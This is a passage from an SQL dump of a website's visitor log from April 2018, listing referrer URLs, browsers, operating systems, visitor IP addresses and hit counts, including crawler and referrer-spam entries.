Firefox','Windows','3.6.23','','208.80.194.27','000',1,0),(29354,'2018-04-23','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.27','000',1,0),(29355,'2018-04-23','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',2,0),(29356,'2018-04-24','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.179.130','000',1,0),(29357,'2018-04-24','https://exdocsfiles.com/','MSIE','Windows','6.0','','178.137.165.1','000',1,0),(29358,'2018-04-24','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','164.132.211.151','000',2,0),(29359,'2018-04-24','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(29360,'2018-04-24','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(29361,'2018-04-24','https://univerfiles.com/','MSIE','Windows','7.0a1','','178.137.165.1','000',2,0),(29362,'2018-04-24','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(29363,'2018-04-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1767.D0k42gwPoHqQBMoOIgJuh30yiUAahqI8Se5jt1w1Q8o.63ad76ca8df46e7e8368a44ffad76d6caa1e67db&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041d2NvZ0cyblBFM3hwZmx3ODhBQlZWVEFobE1kMnVqODM5SjNCMzZlZWVlZyws&sign=52c373f14c193d27dad70c8721687ba2&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','51.255.232.95','000',2,0),(29364,'2018-04-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1767.ehTkZexkokHwf5_UlHABQA6zYVlm_d2QlsleTM8Qik8.653ef07c1ccb70f3bb51c43b815c5e5f4ce9ba25&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041d2NvZ0cyblBFM3dfSThxVzZDckdBOUlFNEM2UFFYS1hTTlNOTzlHR0J4QSws&sign=1734a729d74204d88803d58a5de1cbe0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','146.185.183.235','000',2,0),(29365,'2018-04-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1767.yoniVuxSz0O1TEgefSP2JK2Ju3O-gm7bBrnUIzVzeUE.71ec7d251253b8d3c1a4e3a0c4a57895eaded060&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042eU5UZkE4UFR5dlRXenZ1ekFKSGh1UkczbWRpUmI4anNQY2JIZzY3TjFxdyws&sign=3a1c099385bb15b391bd624797c9c0e5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.203.133','000',2,0),(29366,'2018-04-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1767.fbuS7XbvNE0WDd-KovQpF201NVPc0nM9cZSTtkC-oEI.d4304ae6127613ef8fb1fb84e0b855f042de4a4f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040bzBWQjY2dnNlcVl2MmtEVDl5SnlCWHA4MTYzY18tSXNUTFZiN2lnRG9tUSws&sign=8aabd81d73d2eaf05a8f3ce0d6a006f0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.134.63','000',2,0),(29367,'2018-04-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1767.iy023fgXsS_Fpw5Nck0pq5MqjceP4iuCpQZwEqHNH6g.3fc8289f22f841fa1caa7e4711eb66e79acc6433&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043bFdJbmljajk0LXNCRFI1YVM5OVcycFBOS19FaFV3YTlUU2FLR0pjTTM5dyws&sign=e6cd552ce42ee1dfded4178b0119beea&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.145.105','000',2,0),(29368,'2018-04-24','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1767.K7BDVxocXk4we4G31cM3YS-hIQKpmkr5uXXbs_AQxPY.5f577271c365c27ddd295dd08333e6eddf5b8352&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043SHlERUJrMVZkbEN3c0ZRREVFMExKR2UwZ2UxTEN0U0VSZ21aTmtOX09pUSws&sign=521347321ead208dbc515c27faa44ec4&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.75.10.253','000',2,0),(29369,'2018-04-24','https://zphiblgz.org','Chrome','Windows','34.0.1847.116','','159.65.24.22','000',2,0),(29370,'2018-04-24','https://zphiblgz.org','Python-urllib','Unknown','2.6','','5.62.60.187','000',1,0),(29371,'2018-04-24','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.57.167','000',1,0),(29372,'2018-04-24','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.27.34','000',1,0),(29373,'2018-04-24','https://zphiblgz.org','python-requests','Unknown','2.18.4','','158.69.101.124','000',1,0),(29374,'2018-04-24','https://www.google.com/','Chrome','Windows','65.0.3325.181','','63.97.77.130','000',5,0),(29375,'2018-04-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.225.34','000',8,0),(29376,'2018-04-24','https://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.225.34','000',1,0),(29377,'2018-04-24','https://zphiblgz.org/','Firefox','Windows','33.1','','77.120.125.23','000',2,0),(29378,'2018-04-24','https://zphiblgz.org/','Opera Next','Windows','49.0.2725.47','','46.191.171.109','000',1,0),(29379,'2018-04-24','https://4inn.ru/','MSIE','Windows','5.5','','5.248.196.93','000',3,0),(29380,'2018-04-24','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(29381,'2018-04-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(29382,'2018-04-24','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','159.203.100.183','000',18,0),(29383,'2018-04-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','159.203.100.183','000',1,0),(29384,'2018-04-24','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','159.203.173.65','000',19,0),(29385,'2018-04-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','159.203.173.65','000',1,0),(29386,'2018-04-24','https://www.xn--80aaajkrncdlqdh6ane8t.xn--p1ai/','Opera','Windows','8.00','','46.119.118.96','000',2,0),(29387,'2018-04-24','https://www.google.com/','Chrome','Android','65.0.3325.109','','71.127.150.254','000',4,0),(29388,'2018-04-24','https://www.google.com/','Safari','iPhone','11.0','','172.58.185.118','000',7,0),(29389,'2018-04-24','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','31.130.4.240','000',2,0),(29390,'2018-04-24','https://workius.ru/','MSIE','Windows','5.5','','37.115.185.9','000',2,0),(29391,'2018-04-24','https://zphiblgz.org/','Firefox','Windows','32.1','','136.169.197.127','000',1,0),(29392,'2018-04-24','https://zphiblgz.org/','Firefox','Windows','30.0','','136.169.197.127','000',1,0),(29393,'2018-04-24','https://www.google.com/','Safari','iPhone','11.0','','108.45.98.129','000',4,0),(29394,'2018-04-24','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',2,0),(29395,'2018-04-24','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.31','000',1,0),(29396,'2018-04-24','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.31','000',1,0),(29397,'2018-04-24','https://goodhumor24.com/','MSIE','Windows','6.0','','46.119.118.96','000',3,0),(29398,'2018-04-24','https://zphiblgz.org','Firefox','Windows','57.0','','51.254.97.56','000',2,0),(29399,'2018-04-24','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(29400,'2018-04-24','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.30','000',1,0),(29401,'2018-04-24','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.32','000',1,0),(29402,'2018-04-24','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.32','000',1,0),(29403,'2018-04-24','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(29404,'2018-04-24','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.27','000',1,0),(29405,'2018-04-25','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',2,0),(29406,'2018-04-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.35','000',1,0),(29407,'2018-04-25','https://zphiblgz.org/','Opera Next','Windows','49.0.2725.47','','137.74.132.80','000',2,0),(29408,'2018-04-25','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','138.68.171.165','000',2,0),(29409,'2018-04-25','https://zphiblgz.org/','Chrome','Windows','62.0.3202.62','','77.120.125.23','000',2,0),(29410,'2018-04-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.229.118.96','000',5,0),(29411,'2018-04-25','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.165.74','000',2,0),(29412,'2018-04-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.75','000',1,0),(29413,'2018-04-25','https://documentbase.net/','Opera','Windows','9.00','','37.115.185.9','000',1,0),(29414,'2018-04-25','http://zahvat.ru/','MSIE','Windows','6.0','','46.119.118.96','000',2,0),(29415,'2018-04-25','http://t-rec.su/','MSIE','Windows','6.0','','46.118.114.175','000',7,0),(29416,'2018-04-25','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.35','000',1,0),(29417,'2018-04-25','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1768.uG0q5baS6G1t1Pnhkhd_eIC_X1HT8p0xXIhI8rpOSFQ.17266563051f60ce5b01189478205a4d771196d0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043RmJUQTc0SS1XUkQ4M0RaSG85VlJFaHNZLVVRQ29haVlhSDFkZWQ5RVpLZyws&sign=cf49fe79366fd28a5e8ccb44e5cf8b8f&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.182.249','000',2,0),(29418,'2018-04-25','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1768.JyQqeZjm79KmHWCpQ-1tC1BEoVretFNY5YoU0MgP1vQ.e8e7c84d9db5acd4e9c86de08a2390e3914d5098&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043ZDNoTGtfRy1nYjhkLVhUU1NiRnZoR0lpN2tXaDdlMWxCZEFpSFZfZ29PQSws&sign=9606731d416b5f954474d2c460c5c9ce&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.125.203','000',2,0),(29419,'2018-04-25','https://zphiblgz.org','python-requests','Unknown','2.18.1','','61.154.29.93','000',2,0),(29420,'2018-04-25','https://zphiblgz.org','Safari','Macintosh','7.0.6','','61.154.29.93','000',1,0),(29421,'2018-04-25','https://zphiblgz.org','Safari','Macintosh','7.0.5','','61.154.29.93','000',1,0),(29422,'2018-04-25','https://zphiblgz.org','Chrome','Linux','35.0.1916.153','','61.154.29.93','000',1,0),(29423,'2018-04-25','https://zphiblgz.org','Firefox','Windows','31.0','','61.154.29.93','000',1,0),(29424,'2018-04-25','https://zphiblgz.org','Safari','Macintosh','7.0.4','','61.154.29.93','000',1,0),(29425,'2018-04-25','https://zphiblgz.org','Chrome','Windows','36.0.1985.125','','61.154.29.93','000',1,0),(29426,'2018-04-25','https://zphiblgz.org','Firefox','Macintosh','31.0','','61.154.29.93','000',2,0),(29427,'2018-04-25','http://zphiblgz.org','Firefox','Windows','41.0','','61.154.29.93','000',12,0),(29428,'2018-04-25','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1768.YCGs4cuV0oCVfXdD5FuZhTRvlom3_mySWsESh45x63k.322305dbe879fa46c29fe4b2e68cd64c509b315c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042Z1E5UHd0Yy0zeHFJdWNHLWIxck5ja1dkT0dicGJEaGJweTJwaDFWaDg0dyws&sign=24e464c6a18fd4a7bac1f408e283bdde&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','128.199.35.20','000',2,0),(29429,'2018-04-25','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1768.8-a5sXaSYnWLk0LiJWi3pFSumAi6LYt3rVFXR8cXVlk.501d1b7a7be759b848030168fd4c33a79e9dabf6&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041b1JkeVRvUlVOWWZlcVpCLXZDUHVrSnRLeUgwN0pyek8xcWVZeTYyMUliZyws&sign=f3cdb9f20e2d627cabfc9c6e461838ff&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','89.145.162.81','000',2,0),(29430,'2018-04-25','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjOza3fudXaAhWDhOAKHdakCLoQFggnMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','50.225.39.78','000',7,0),(29431,'2018-04-25','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1768.N5IQgjzn8f_i3N1vfo5huBm6wsfoWS9DW55-MailQMo.5b31b2f02dc33cf50f6c63f71114d076907deb80&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042aG9iRmxrV0FQaDNJR1ExSDlCd0lXM2xxRS0xTUVSY3FYMVNENzhKd0Rwdyws&sign=aee8c616c06846d4b4fb5bf26f3f62ce&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','151.80.126.210','000',2,0),(29432,'2018-04-25','https://zphiblgz.org/','Chrome','Windows','49.0.2623.112','','31.130.4.240','000',2,0),(29433,'2018-04-25','https://zphiblgz.org/','Firefox','Windows','57.0','','31.130.4.240','000',2,0),(29434,'2018-04-25','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1768.-r9HM57zMlQQaxXmJPXSjtFWAK0Rr6iW1MLyCCbGrDQ.a151b3d7798efd269684c8146e180c9e1c03fe66&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043QkZ6LTVaOHJBcXFSYVJUZlAxWWc1MmFCNWlvMTNXTzRvaVl0Wjdqb2NEUSws&sign=3265856ad953bed696dadd9c11a1e85a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','103.102.44.204','000',2,0),(29435,'2018-04-25','https://zphiblgz.org','Firefox','Linux','52.0','','148.251.75.46','000',1,0),(29436,'2018-04-25','https://zphiblgz.org/','Firefox','Windows','31.0','','31.130.4.240','000',2,0),(29437,'2018-04-25','https://www.google.com/','Chrome','Windows','65.0.3325.181','','167.93.38.250','000',3,0),(29438,'2018-04-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.231.72.175','000',8,0),(29439,'2018-04-25','https://search.yahoo.com/','Chrome','Windows','66.0.3359.117','','100.36.84.169','000',1,0),(29440,'2018-04-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.196.19.244','000',5,0),(29441,'2018-04-25','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(29442,'2018-04-25','https://zphiblgz.org','Firefox','Windows','40.1','','180.248.226.193','000',2,0),(29443,'2018-04-25','https://zphiblgz.org','Chrome','Macintosh','65.0.3325.181','','71.179.18.125','000',5,0),(29444,'2018-04-25','http://www.zphibmaryland.org/chapters/','SamsungBrowser','Android','7.0','','73.129.23.113','000',3,0),(29445,'2018-04-25','http://www.stavimdveri.ru/sitemap.html','MSIE','Unknown','6.0','','178.137.165.61','000',1,0),(29446,'2018-04-25','https://zphiblgz.org','Firefox','Windows','40.1','','45.56.152.181','000',2,0),(29447,'2018-04-25','https://zphiblgz.org','Chrome','Windows','57.0.2987.133','','23.239.199.173','000',2,0),(29448,'2018-04-25','https://www.google.com/','Chrome','Windows','66.0.3359.117','','199.19.252.173','000',1,0),(29449,'2018-04-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(29450,'2018-04-25','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(29451,'2018-04-25','android-app://com.google.android.googlequicksearchbox/https/www.google.com','Chrome','Android','66.0.3359.106','','96.244.213.109','000',3,0),(29452,'2018-04-25','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.30','000',1,0),(29453,'2018-04-25','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.30','000',1,0),(29454,'2018-04-25','https://zphiblgz.org','Firefox','Macintosh','33.0','','34.204.178.19','000',1,0),(29455,'2018-04-25','https://www.bing.com/','MSIE','Windows','11.0','','204.108.89.190','000',2,0),(29456,'2018-04-25','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.32','000',2,0),(29457,'2018-04-25','https://zphiblgz.org','Firefox','Windows','40.1','','201.17.210.218','000',2,0),(29458,'2018-04-25','https://www.google.com/','Chrome','Windows','65.0.3325.181','','96.88.220.41','000',11,0),(29459,'2018-04-25','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(29460,'2018-04-25','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','104.131.19.168','000',2,0),(29461,'2018-04-25','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(29462,'2018-04-25','http://zphiblgz.org/','MSIE','Windows','11.0','','185.220.70.172','000',1,0),(29463,'2018-04-25','https://zphiblgz.org','Safari','Macintosh','11.1','','96.241.16.101','000',5,0),(29464,'2018-04-25','https://zphiblgz.org/','Safari','iPhone','11.0','','108.45.98.129','000',1,0),(29465,'2018-04-25','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.32','000',1,0),(29466,'2018-04-25','https://office2web.com/','MSIE','Windows','6.0','','37.115.185.9','000',3,0),(29467,'2018-04-25','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.27.97','000',1,0),(29468,'2018-04-25','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.31','000',1,0),(29469,'2018-04-25','https://zphiblgz.org','Firefox','Windows','40.1','','81.213.177.177','000',2,0),(29470,'2018-04-25','http://zphiblgz.org/','Chrome','Windows','49.0.2623.112','','176.109.176.146','000',3,0),(29471,'2018-04-25','https://www.google.com/','Chrome','Windows','66.0.3359.117','','71.246.192.170','000',5,0),(29472,'2018-04-25','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.30','000',1,0),(29473,'2018-04-25','https://buy-meds24.com/cialis-fr.html','MSIE','Windows','6.0','','178.137.165.61','000',4,0),(29474,'2018-04-26','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.35','000',1,0),(29475,'2018-04-26','https://www.xn--80aaajkrncdlqdh6ane8t.xn--p1ai/','MSIE','Windows','6.0','','46.119.118.96','000',5,0),(29476,'2018-04-26','http://www.regionshop.biz/','MSIE','Windows','6.0','','178.137.165.61','000',3,0),(29477,'2018-04-26','https://zphiblgz.org','Firefox','Windows','40.1','','61.3.194.41','000',2,0),(29478,'2018-04-26','https://zphiblgz.org/','Firefox','Windows','30.0','','176.109.176.146','000',1,0),(29479,'2018-04-26','https://zphiblgz.org','xpymep','Unknown','Unknown','','176.109.176.146','000',1,0),(29480,'2018-04-26','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.218.133','000',2,0),(29481,'2018-04-26','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.178.25','000',2,0),(29482,'2018-04-26','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.210.250','000',1,0),(29483,'2018-04-26','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.188.39','000',2,0),(29484,'2018-04-26','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.184.58','000',2,0),(29485,'2018-04-26','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.210.53','000',2,0),(29486,'2018-04-26','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.178.205','000',2,0),(29487,'2018-04-26','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.179.197','000',1,0),(29488,'2018-04-26','https://zphiblgz.org','Firefox','Windows','40.0','','188.138.105.83','000',2,0),(29489,'2018-04-26','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.20','000',1,0),(29490,'2018-04-26','https://zphiblgz.org/','Chrome','Windows','63.0.3223.8','','62.122.92.7','000',2,0),(29491,'2018-04-26','https://www.incomekey.net/25881788/ultimate-wordpress-seo-guide-for-beginners/','Firefox','Windows','58.0','','112.5.248.158','000',2,0),(29492,'2018-04-26','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','46.101.56.110','000',2,0),(29493,'2018-04-26','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(29494,'2018-04-26','https://beachtoday.ru/','MSIE','Windows','5.0','','5.248.196.93','000',3,0),(29495,'2018-04-26','https://zphiblgz.org','Chrome','FreeBSD','35.0.1916.153','','101.255.82.140','000',2,0),(29496,'2018-04-26','https://workius.ru/','MSIE','Unknown','7.0b','','37.115.185.9','000',1,0),(29497,'2018-04-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1769.4qN984XLwc2QeBp6m3t_2Sy44sjVmWjdcAYgjEi_F9c.670e515184afd279b45b2a2e8a9d00bba65e4628&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040QXFodHRLN2RqSnhFdGF6a2oySU4zQWRMU3Jyci1FNDFxV2NPaEpQZTZEdyws&sign=73a69e2b4dde33e960b7bf5051642b73&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.141.145','000',2,0),(29498,'2018-04-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1769.i43yc7InJhKhtFqEA-GAJJ8I4uvYysqk5gYvbAeFqbw.0d2ced2913ee1be3aab69e6dba6e1e12382e6858&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041Rnc0ZkM0U3JtaGlZTmVUQW1uS3MyOVctUU94WnNiSHBuS3k2bEJvVjVZdyws&sign=e727ecbbd68902379c85a6714139762b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.175.32','000',2,0),(29499,'2018-04-26','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1769.jU5s5j2wDc-IGbhPfaTUz8pqepniy7-U-3xBdpssUzU.2356c016cb936e1d7b8f339ea9b6cfa419c65652&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043Z2FZTXd1TVgzYkoxWGpLeFR4TzRVNTZzTVg5Mm92UEg5Tjl6X2gwTm5Vdyws&sign=fcbd7b1071624ae761553872b16381e3&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.234.111','000',2,0),(29500,'2018-04-26','https://zphiblgz.org/','Firefox','Windows','31.0','','77.120.125.23','000',2,0),(29501,'2018-04-26','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(29502,'2018-04-26','https://zphiblgz.org','Chrome','Windows','58.0.3029.81','','138.128.123.59','000',2,0),(29503,'2018-04-26','https://zphiblgz.org/','Opera Next','Windows','49.0.2725.47','','31.130.20.61','000',4,0),(29504,'2018-04-26','https://zphiblgz.org/','Chrome','Windows','55.0.2883.87','','31.130.20.61','000',2,0),(29505,'2018-04-26','http://juliesfreebies.com/wp-login.php','Chrome','Windows','56.0.2924.87','','73.252.51.184','000',1,0),(29506,'2018-04-26','https://zphiblgz.org/wp-json/wp/v2/posts?slug=nuts-bolts-2-organizing-writing-college-scholarship-applications','Chrome','Linux','56.0.2924.87','','73.252.51.184','000',3,0),(29507,'2018-04-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','94.23.5.212','000',6,0),(29508,'2018-04-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','94.23.221.187','000',2,0),(29509,'2018-04-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','94.23.217.30','000',2,0),(29510,'2018-04-26','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.29','000',1,0),(29511,'2018-04-26','https://www.google.com/','Edge','Windows','16.16299','','108.129.29.237','000',2,0),(29512,'2018-04-26','https://zphiblgz.org/','Firefox','Windows','52.0','','77.120.125.23','000',2,0),(29513,'2018-04-26','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',1,0),(29514,'2018-04-26','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.27','000',1,0),(29515,'2018-04-26','https://basicsoftradingstocks.wordpress.com/2018/04/04/dont-check-your-portfolio-today/','Safari','Macintosh','10.0.3','','73.252.51.184','000',4,0),(29516,'2018-04-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(29517,'2018-04-26','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(29518,'2018-04-26','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.30','000',1,0),(29519,'2018-04-26','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.31','000',1,0),(29520,'2018-04-26','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.31','000',1,0),(29521,'2018-04-26','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(29522,'2018-04-26','https://zphiblgz.org','MSIE